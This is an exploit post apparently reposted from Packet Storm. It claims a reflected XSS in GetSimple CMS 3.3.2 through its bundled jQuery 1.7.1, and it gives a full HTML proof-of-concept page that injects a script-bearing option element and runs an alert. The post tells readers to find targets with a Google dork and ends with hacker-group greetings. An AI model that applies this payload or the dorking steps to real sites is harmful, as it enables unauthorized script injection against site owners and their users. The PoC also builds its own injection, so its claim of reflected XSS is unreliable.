Share
## https://sploitus.com/exploit?id=PACKETSTORM:174321
====================================================================================================================================  
| # Title : GetSimple CMS v3.3.2 XSS Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit) |  
| # Vendor : http://get-simple.info/ |  
| # Dork : © 2009-2014 GetSimple CMS – Version 3.3.2 |  
====================================================================================================================================  
  
poc :  
  
[+] Dorking İn Google Or Other Search Enggine.  
  
[+] LIne 5 Se7 y0ur T@rg3t .  
  
[+] XSS Reflected - Jquery v1.7.1 :  
  
<html>  
<head>  
<meta charset="utf-8">  
<title>XSS Reflected - Jquery v1.7.1 </title>  
<script src="http://127.0.0.1/GetSimpleCMS/admin/template/js/jquery.min.js"></script>  
<script>  
$(function() {  
$('#users').each(function() {  
var select = $(this);  
var option = select.children('option').first();  
select.after(option.text());  
select.hide();  
});  
});  
</script>  
</head>  
  
  
<body>  
<form method="post">  
<p>  
<select id="users" name="users">  
<option value="xssreflected"><script>alert(&#x27;xss  
reflected - jquery v1.7.1 by - indoushka thnx to   
@firebitsbr - mauro.risonho@gmail.com&#x27;);</script></option>  
</select>  
</p>  
</form>  
</body>  
</html>  
  
Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |  
=======================================================================================================================================